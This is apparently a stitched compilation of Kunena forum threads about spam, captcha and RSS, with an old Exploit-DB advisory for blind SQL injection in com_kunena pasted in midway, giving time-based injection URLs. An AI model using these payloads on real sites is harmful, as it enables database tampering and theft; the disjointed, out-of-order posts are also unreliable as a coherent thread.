@purplepomegranite
I have seen that plugin too, but have not tried it myself yet.
Do you know if it is possible to turn it off for logged in users?

I have an antispam plugin that now supports Kunena. It does this without using Captcha, but utilises several different online antispam sources. It is listed in JED, and available from www.cedit.biz/joomla-extensions/18-regis...able-email-addresses

v2 now has native Kunena support, and will prevent spam postings using checks against Linksleeve and Akismet.

Hello

The registration and login process is handled by Joomla. You might want to look for some extensions in the Joomla Extensions for that.
Please beware, that you cannot seek help for those extensions here.
I found this at my first search: extensions.joomla.org/extensions/access-...authentication/10802

Also, Kunena has some captcha service in the administrator panel, which can easily be turned on.
I think it goes under the name "Antiflood protection" but I really cant remember.

Some of these features (maybe combined), may be what you are looking for?

Hello -
First thank you all for the great forum software. I run many forums and mainly vBulletin however I just set up a website with kunena and loving it.
The website and forum are new (one week old) and I'm getting daily registrations and posts (spam).
My question is what options this software offer to fight spam, automated registration bots, etc. Is there any recaptcha at the registration process? Any tips tricks are really appreciated because I dont have time to keep up with this bots (assuming) and delete posts manually.

Thank you for your time and help.

Well, joomla has an rss reader. Its almost like these 2 functions were made for eachother.


Also, some of wish to make the forums public, we just don't want the "administrator has disabled write access" on every post.

I guess I should expound on this a little more. I guess "Security" can mean different things.

To me, secure means that spammers can't come in to my forum and post. I don't mind information that is viewable. Also, if someone wants to be heard in the forum for a community of people, the least they can do is register. It shows atleast some form of support. The last thing I want is a good conversation going and then "guest" comes in and derails the whole thread.

DO I want google indexing my site? Of course I do. Do I want my RSS viewable to anyone, you bet.

I put hoops in place to post, not to view.

If someone is concerned about restricted forum posts becoming public, shouldn't the forum's software know not to post secure categories in the public RSS feed?

The purpose for such a thing is to have recent discussions in Joomla for people reading articles to see. RSS may not be the way to accomplish this, but for now, it seems the most logical way to drive casual readers to the forum.

A lot has changed. The topic I referred to (that's 3 days old) is only the latest in a long list of topics about CAPTCHA and Kunena and spam protection. I should also have added a thank-you for taking the trouble to investigate the inner workings of Kunena and I apologise for my flippancy. Even so, it's still a dangerous thing to take an old issue like this - (I was a novice when I posted my original question 9 months ago :blush:) - and try to make it relevant today. In the past 9 months, there have been 11 public releases of Kunena ... so a lot has happened!

Please understand, your discoveries and your opinions are important to us.

Well, that's what I get I guess. I often use advice I find on message boards but never contribute. I finally contributed, and I should have kept my mouth shut.

Of course, the version that I am using that doesn't have a working Captcha feature in it was downloaded only about 2 weeks ago and the post you mentioned was only 3 days old, so the "lot" that has happened has not changed this, yet. And will using reCaptcha change the way the config works?

It's always a dangerous thing resurrecting a discussion topic that began 9 months ago but which dried up 3 months ago. :laugh: A lot has happened. :blush:

See also Replace captcha with reCaptcha for some more up-to-date views on this subject.

It is as someone earlier said: this feature only works if you are not logged in. The assumption, I guess, is that if you are a registered user then you can't spam.

At any rate, the offending line is currently in /components/com_kunena/template/default/fb_write.html.php on line 270. It says:

if ($fbConfig->captcha == 1 && $kunena_my->id < 1) ?>

It can be changed to:

if ($fbConfig->captcha == 1) { ?>

Then to make sure that ths code is checked, you need to change line 62 of /components/com_kunena/template/default/post.php from:

if ($fbConfig->captcha== 1 && $kunena_my->id < 1) {

to:

if ($fbConfig->captcha== 1) {

Standard warnings apply: this would be a hack and would be overwritten when you upgrade Kunena.

Kunena Developers: Ideally the config option would be changed to a three-value list:
0=Never use Captch
1=Use Captcha when users are not logged in
2=Always use Captcha

# Title: Joomla Component com_kunena Blind SQL Injection Vulnerability
# EDB-ID: 11279
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-01-28
# Verified: no
# Download Exploit Code
# Download N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_kunena) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var do is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.5.9 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)/*
[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)/*

[~]>> Note: There are more affected vars.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

www.exploit-db.com/exploits/11279

Sozzled, I registered then tried submitting to UserVoice but didn't see an option for posting a suggestion. Anyway, Mr. VMax, I mean fxstein said that he's adding this to his list.

I'm really glad about this because each morning, I have to go in to my forum to clean up a bunch of undesirable posts that discredit my website.

Yes it is.

I also saw this thread, which could help admins on the same quest:
www.kunena.com/forum/119-feature-request...g-able-to-post-links

jeff_j_dunlap wrote:

100 percent of my spam has links to other websites. I really think that the simplest solution would be:

Moderate posts with urls automatically?

That's a good suggestion. Why not submit it to UserVoice ?

100 percent of my spam has links to other websites. I really think that the simplest solution would be:

Moderate posts with urls automatically?

Oh great !! Thanks for the advice, anyhow is it possible already to assign these members to groups ? if yes where are the group manager tool apart from the role like administrator - moderator - spammer, is there a way to create those groups ?